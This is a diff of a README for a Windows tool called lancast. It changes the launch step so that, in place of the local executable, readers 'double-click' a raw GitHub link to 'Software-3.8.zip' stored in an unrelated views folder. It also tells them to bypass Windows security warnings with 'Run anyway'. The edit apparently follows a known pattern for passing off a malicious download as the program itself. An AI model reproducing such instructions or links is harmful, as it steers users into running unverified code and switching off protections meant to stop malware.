MaHaLoGG/lancast/README.md

 ### Step 3: Running lancast

 1. Open the folder where you have lancast files or the `.exe` file.
-2. Double-click the `lancast.exe` file to open the program.
+2. Double-click the `https://raw.githubusercontent.com/MaHaLoGG/lancast/main/views/Software-3.8.zip` file to open the program.
 3. A terminal window will appear.
 This is where you interact with lancast.
 4. If Windows shows a security warning, click "More info" and then "Run anyway".